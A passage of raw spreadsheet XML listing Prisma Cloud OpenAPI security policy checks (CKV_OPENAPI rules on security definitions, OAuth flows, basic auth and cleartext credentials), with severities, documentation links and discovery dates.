        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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6" t="inlineStr">
        <is>
          <t>67ec7cac-244d-4c13-b286-2fd8b2e01e27</t>
        </is>
      </c>
      <c r="AI1286" t="inlineStr"/>
      <c r="AJ1286" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1286" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1287">
      <c r="A1287" t="inlineStr"/>
      <c r="B1287" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1287" s="2" t="inlineStr"/>
      <c r="D1287" t="inlineStr"/>
      <c r="E1287" t="inlineStr"/>
      <c r="F1287" t="inlineStr"/>
      <c r="G1287" t="b">
        <v>1</v>
      </c>
      <c r="H12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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1287" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="K1287" t="inlineStr">
        <is>
          <t>OpenAPI Security Definitions Object should be set and not empty</t>
        </is>
      </c>
      <c r="L1287" t="inlineStr"/>
      <c r="M1287" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1287" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1287" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1287" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1287" t="inlineStr"/>
      <c r="R1287" t="inlineStr"/>
      <c r="S1287" t="inlineStr"/>
      <c r="T1287" t="b">
        <v>0</v>
      </c>
      <c r="U1287" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1287" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="W1287" t="inlineStr">
        <is>
          <t>Ensure that securityDefinitions is defined and not empty</t>
        </is>
      </c>
      <c r="X1287" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/api-policies/openapi-policies/ensure-that-securitydefinitions-is-defined-and-not-empty</t>
        </is>
      </c>
      <c r="Y1287" t="inlineStr"/>
      <c r="Z1287" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA1287" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1287" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1287" t="inlineStr">
        <is>
          <t>CKV_OPENAPI_1</t>
        </is>
      </c>
      <c r="AD1287" t="b">
        <v>1</v>
      </c>
      <c r="AE1287" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1287" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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7" t="inlineStr">
        <is>
          <t>10efd986-6125-41f6-83f9-871a0a657aae</t>
        </is>
      </c>
      <c r="AI1287" t="inlineStr"/>
      <c r="AJ1287" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1287" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1288">
      <c r="A1288" t="inlineStr"/>
      <c r="B1288" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1288" s="2" t="inlineStr"/>
      <c r="D1288" t="inlineStr"/>
      <c r="E1288" t="inlineStr"/>
      <c r="F1288" t="inlineStr"/>
      <c r="G1288" t="b">
        <v>1</v>
      </c>
      <c r="H12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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1288" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="K1288" t="inlineStr">
        <is>
          <t>Array does not have a maximum number of items</t>
        </is>
      </c>
      <c r="L1288" t="inlineStr"/>
      <c r="M1288" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1288" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1288" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1288" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1288" t="inlineStr"/>
      <c r="R1288" t="inlineStr"/>
      <c r="S1288" t="inlineStr"/>
      <c r="T1288" t="b">
        <v>0</v>
      </c>
      <c r="U1288" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1288" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="W1288" t="inlineStr">
        <is>
          <t>Ensure that arrays have a maximum number of items</t>
        </is>
      </c>
      <c r="X1288" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/api-policies/openapi-policies/bc-openapi-21</t>
        </is>
      </c>
      <c r="Y1288" t="inlineStr"/>
      <c r="Z1288" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA1288" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1288" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1288" t="inlineStr">
        <is>
          <t>CKV_OPENAPI_21</t>
        </is>
      </c>
      <c r="AD1288" t="b">
        <v>1</v>
      </c>
      <c r="AE1288" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1288" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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8" t="inlineStr">
        <is>
          <t>c521be55-0c0d-4544-9764-1a761f9c5f72</t>
        </is>
      </c>
      <c r="AI1288" t="inlineStr"/>
      <c r="AJ1288" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1288" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1289">
      <c r="A1289" t="inlineStr"/>
      <c r="B1289" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1289" s="2" t="inlineStr"/>
      <c r="D1289" t="inlineStr"/>
      <c r="E1289" t="inlineStr"/>
      <c r="F1289" t="inlineStr"/>
      <c r="G1289" t="b">
        <v>1</v>
      </c>
      <c r="H12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89" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1289" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="K1289" t="inlineStr">
        <is>
          <t>Operation Objects Uses 'Implicit' Flow</t>
        </is>
      </c>
      <c r="L1289" t="inlineStr"/>
      <c r="M1289" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1289" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1289" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1289" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1289" t="inlineStr"/>
      <c r="R1289" t="inlineStr"/>
      <c r="S1289" t="inlineStr"/>
      <c r="T1289" t="b">
        <v>0</v>
      </c>
      <c r="U1289" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1289" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="W1289" t="inlineStr">
        <is>
          <t>Ensure that operation objects do not use 'implicit' flow, which is deprecated - version 2.0 files</t>
        </is>
      </c>
      <c r="X1289" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/api-policies/openapi-policies/bc-openapi-14</t>
        </is>
      </c>
      <c r="Y1289" t="inlineStr"/>
      <c r="Z1289" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA1289" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1289" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1289" t="inlineStr">
        <is>
          <t>CKV_OPENAPI_14</t>
        </is>
      </c>
      <c r="AD1289" t="b">
        <v>1</v>
      </c>
      <c r="AE1289" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1289" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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89" t="inlineStr">
        <is>
          <t>2c090e1b-e819-4a68-b461-55ef26d7cdb9</t>
        </is>
      </c>
      <c r="AI1289" t="inlineStr"/>
      <c r="AJ1289" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1289" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1290">
      <c r="A1290" t="inlineStr"/>
      <c r="B1290" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1290" s="2" t="inlineStr"/>
      <c r="D1290" t="inlineStr"/>
      <c r="E1290" t="inlineStr"/>
      <c r="F1290" t="inlineStr"/>
      <c r="G1290" t="b">
        <v>1</v>
      </c>
      <c r="H12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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1290" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="K1290" t="inlineStr">
        <is>
          <t>OpenAPI If the security scheme is not of type 'oauth2', the array value must be empty</t>
        </is>
      </c>
      <c r="L1290" t="inlineStr"/>
      <c r="M1290" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1290" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1290" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1290" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1290" t="inlineStr"/>
      <c r="R1290" t="inlineStr"/>
      <c r="S1290" t="inlineStr"/>
      <c r="T1290" t="b">
        <v>0</v>
      </c>
      <c r="U1290" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1290" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="W1290" t="inlineStr">
        <is>
          <t>Ensure that if the security scheme is not of type 'oauth2', the array value must be empty</t>
        </is>
      </c>
      <c r="X1290" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/api-policies/openapi-policies/ensure-that-if-the-security-scheme-is-not-of-type-oauth2-the-array-value-must-be-empty</t>
        </is>
      </c>
      <c r="Y1290" t="inlineStr"/>
      <c r="Z1290" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA1290" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1290" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1290" t="inlineStr">
        <is>
          <t>CKV_OPENAPI_2</t>
        </is>
      </c>
      <c r="AD1290" t="b">
        <v>1</v>
      </c>
      <c r="AE1290" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1290" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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0" t="inlineStr">
        <is>
          <t>d9145ac2-c2bf-416b-97c6-a05ec8668827</t>
        </is>
      </c>
      <c r="AI1290" t="inlineStr"/>
      <c r="AJ1290" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1290" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1291">
      <c r="A1291" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B1291" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1291" s="2" t="inlineStr"/>
      <c r="D1291" t="inlineStr"/>
      <c r="E1291" t="inlineStr"/>
      <c r="F1291" t="inlineStr"/>
      <c r="G1291" t="b">
        <v>1</v>
      </c>
      <c r="H12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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1291" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="K1291" t="inlineStr">
        <is>
          <t>Cleartext credentials over unencrypted channel should not be accepted for the operation</t>
        </is>
      </c>
      <c r="L1291" t="inlineStr"/>
      <c r="M1291" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1291" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1291" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1291" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1291" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R1291" t="inlineStr">
        <is>
          <t>5.1.1 Config - Other</t>
        </is>
      </c>
      <c r="S1291" t="inlineStr"/>
      <c r="T1291" t="b">
        <v>0</v>
      </c>
      <c r="U1291" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1291" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="W1291" t="inlineStr">
        <is>
          <t>Ensure that security schemes don't allow cleartext credentials over unencrypted channel</t>
        </is>
      </c>
      <c r="X1291" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/api-policies/openapi-policies/ensure-that-security-schemes-dont-allow-cleartext-credentials-over-unencrypted-channel</t>
        </is>
      </c>
      <c r="Y1291" t="inlineStr"/>
      <c r="Z1291" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA1291" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1291" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1291" t="inlineStr">
        <is>
          <t>CKV_OPENAPI_3</t>
        </is>
      </c>
      <c r="AD1291" t="b">
        <v>1</v>
      </c>
      <c r="AE1291" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1291" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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1" t="inlineStr">
        <is>
          <t>e78cca1d-0acc-45c1-8bf4-8fb7e0210d96</t>
        </is>
      </c>
      <c r="AI1291" t="inlineStr"/>
      <c r="AJ1291" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1291" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1292">
      <c r="A1292" t="inlineStr"/>
      <c r="B1292" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1292" s="2" t="inlineStr"/>
      <c r="D1292" t="inlineStr"/>
      <c r="E1292" t="inlineStr"/>
      <c r="F1292" t="inlineStr"/>
      <c r="G1292" t="b">
        <v>1</v>
      </c>
      <c r="H12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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1292" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="K1292" t="inlineStr">
        <is>
          <t>API spec includes a 'password' flow in OAuth2 authentication</t>
        </is>
      </c>
      <c r="L1292" t="inlineStr"/>
      <c r="M1292" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1292" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1292" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1292" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1292" t="inlineStr"/>
      <c r="R1292" t="inlineStr"/>
      <c r="S1292" t="inlineStr"/>
      <c r="T1292" t="b">
        <v>0</v>
      </c>
      <c r="U1292" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1292" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="W1292" t="inlineStr">
        <is>
          <t>Ensure that security is not using 'password' flow in OAuth2 authentication - version 2.0 files</t>
        </is>
      </c>
      <c r="X1292" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/api-policies/openapi-policies/bc-openapi-8</t>
        </is>
      </c>
      <c r="Y1292" t="inlineStr"/>
      <c r="Z1292" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA1292" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1292" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1292" t="inlineStr">
        <is>
          <t>CKV_OPENAPI_8</t>
        </is>
      </c>
      <c r="AD1292" t="b">
        <v>1</v>
      </c>
      <c r="AE1292" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1292" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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2" t="inlineStr">
        <is>
          <t>bb8d8b60-7c04-4503-b9ea-54df1b28b1f0</t>
        </is>
      </c>
      <c r="AI1292" t="inlineStr"/>
      <c r="AJ1292" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1292" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1293">
      <c r="A1293" t="inlineStr"/>
      <c r="B1293" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1293" s="2" t="inlineStr"/>
      <c r="D1293" t="inlineStr"/>
      <c r="E1293" t="inlineStr"/>
      <c r="F1293" t="inlineStr"/>
      <c r="G1293" t="b">
        <v>1</v>
      </c>
      <c r="H12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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1293" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="K1293" t="inlineStr">
        <is>
          <t>OpenAPI Security object needs to have defined rules in its array and rules should be defined in the securityScheme</t>
        </is>
      </c>
      <c r="L1293" t="inlineStr"/>
      <c r="M1293" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1293" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1293" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1293" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1293" t="inlineStr"/>
      <c r="R1293" t="inlineStr"/>
      <c r="S1293" t="inlineStr"/>
      <c r="T1293" t="b">
        <v>0</v>
      </c>
      <c r="U1293" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1293" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="W1293" t="inlineStr">
        <is>
          <t>Ensure that the global security field has rules defined</t>
        </is>
      </c>
      <c r="X1293" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/api-policies/openapi-policies/ensure-that-the-global-security-field-has-rules-defined</t>
        </is>
      </c>
      <c r="Y1293" t="inlineStr"/>
      <c r="Z1293" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA1293" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1293" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1293" t="inlineStr">
        <is>
          <t>CKV_OPENAPI_4</t>
        </is>
      </c>
      <c r="AD1293" t="b">
        <v>1</v>
      </c>
      <c r="AE1293" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1293" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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3" t="inlineStr">
        <is>
          <t>21b82979-16c2-4cfe-92e6-7848d37c04e2</t>
        </is>
      </c>
      <c r="AI1293" t="inlineStr"/>
      <c r="AJ1293" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1293" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1294">
      <c r="A1294" t="inlineStr"/>
      <c r="B1294" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1294" s="2" t="inlineStr"/>
      <c r="D1294" t="inlineStr"/>
      <c r="E1294" t="inlineStr"/>
      <c r="F1294" t="inlineStr"/>
      <c r="G1294" t="b">
        <v>1</v>
      </c>
      <c r="H12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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1294" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="K1294" t="inlineStr">
        <is>
          <t>API keys transmitted over cleartext</t>
        </is>
      </c>
      <c r="L1294" t="inlineStr"/>
      <c r="M1294" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1294" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1294" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1294" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1294" t="inlineStr"/>
      <c r="R1294" t="inlineStr"/>
      <c r="S1294" t="inlineStr"/>
      <c r="T1294" t="b">
        <v>0</v>
      </c>
      <c r="U1294" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1294" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="W1294" t="inlineStr">
        <is>
          <t>Ensure that API keys are not sent over cleartext</t>
        </is>
      </c>
      <c r="X1294" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/api-policies/openapi-policies/bc-openapi-20</t>
        </is>
      </c>
      <c r="Y1294" t="inlineStr"/>
      <c r="Z1294" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA1294" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1294" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1294" t="inlineStr">
        <is>
          <t>CKV_OPENAPI_20</t>
        </is>
      </c>
      <c r="AD1294" t="b">
        <v>1</v>
      </c>
      <c r="AE1294" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1294" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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4" t="inlineStr">
        <is>
          <t>868cc0cb-868c-4caa-bb29-d5aaa1d1b5ff</t>
        </is>
      </c>
      <c r="AI1294" t="inlineStr"/>
      <c r="AJ1294" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1294" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1295">
      <c r="A1295" t="inlineStr"/>
      <c r="B1295" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1295" s="2" t="inlineStr"/>
      <c r="D1295" t="inlineStr"/>
      <c r="E1295" t="inlineStr"/>
      <c r="F1295" t="inlineStr"/>
      <c r="G1295" t="b">
        <v>1</v>
      </c>
      <c r="H12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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1295" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="K1295" t="inlineStr">
        <is>
          <t>Security definitions uses basic auth</t>
        </is>
      </c>
      <c r="L1295" t="inlineStr"/>
      <c r="M1295" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1295" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1295" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1295" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1295" t="inlineStr"/>
      <c r="R1295" t="inlineStr"/>
      <c r="S1295" t="inlineStr"/>
      <c r="T1295" t="b">
        <v>0</v>
      </c>
      <c r="U1295" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1295" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="W1295" t="inlineStr">
        <is>
          <t>Ensure security definitions do not use basic auth - version 2.0 files</t>
        </is>
      </c>
      <c r="X1295" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/api-policies/openapi-policies/bc-openapi-13</t>
        </is>
      </c>
      <c r="Y1295" t="inlineStr"/>
      <c r="Z1295" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA1295" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1295" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1295" t="inlineStr">
        <is>
          <t>CKV_OPENAPI_13</t>
        </is>
      </c>
      <c r="AD1295" t="b">
        <v>1</v>
      </c>
      <c r="AE1295" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1295" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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5" t="inlineStr">
        <is>
          <t>18ba9d20-c84e-4738-891e-289bbc12ec65</t>
        </is>
      </c>
      <c r="AI1295" t="inlineStr"/>
      <c r="AJ1295" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1295" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1296">
      <c r="A1296" t="inlineStr"/>
      <c r="B1296" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1296" s="2" t="inlineStr"/>
      <c r="D1296" t="inlineStr"/>
      <c r="E1296" t="inlineStr"/>
      <c r="F1296" t="inlineStr"/>
      <c r="G1296" t="b">
        <v>1</v>
      </c>
      <c r="H12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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1296" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="K1296" t="inlineStr">
        <is>
          <t>OpenAPI Security requirement not defined in the security definitions</t>
        </is>
      </c>
      <c r="L1296" t="inlineStr"/>
      <c r="M1296" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1296" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1296" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1296" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1296" t="inlineStr"/>
      <c r="R1296" t="inlineStr"/>
      <c r="S1296" t="inlineStr"/>
      <c r="T1296" t="b">
        <v>0</v>
      </c>
      <c r="U1296" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1296" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="W1296" t="inlineStr">
        <is>
          <t>Ensure that security requirement defined in securityDefinitions</t>
        </is>
      </c>
      <c r="X1296" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/api-policies/openapi-policies/ensure-that-security-requirement-defined-in-securitydefinitions</t>
        </is>
      </c>
      <c r="Y1296" t="inlineStr"/>
      <c r="Z1296" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA1296" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1296" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1296" t="inlineStr">
        <is>
          <t>CKV_OPENAPI_6</t>
        </is>
      </c>
      <c r="AD1296" t="b">
        <v>1</v>
      </c>
      <c r="AE1296" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1296" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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6" t="inlineStr">
        <is>
          <t>5cc16527-6ece-48aa-a135-89fcd361c402</t>
        </is>
      </c>
      <c r="AI1296" t="inlineStr"/>
      <c r="AJ1296" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1296" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1297">
      <c r="A1297" t="inlineStr"/>
      <c r="B1297" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1297" s="2" t="inlineStr"/>
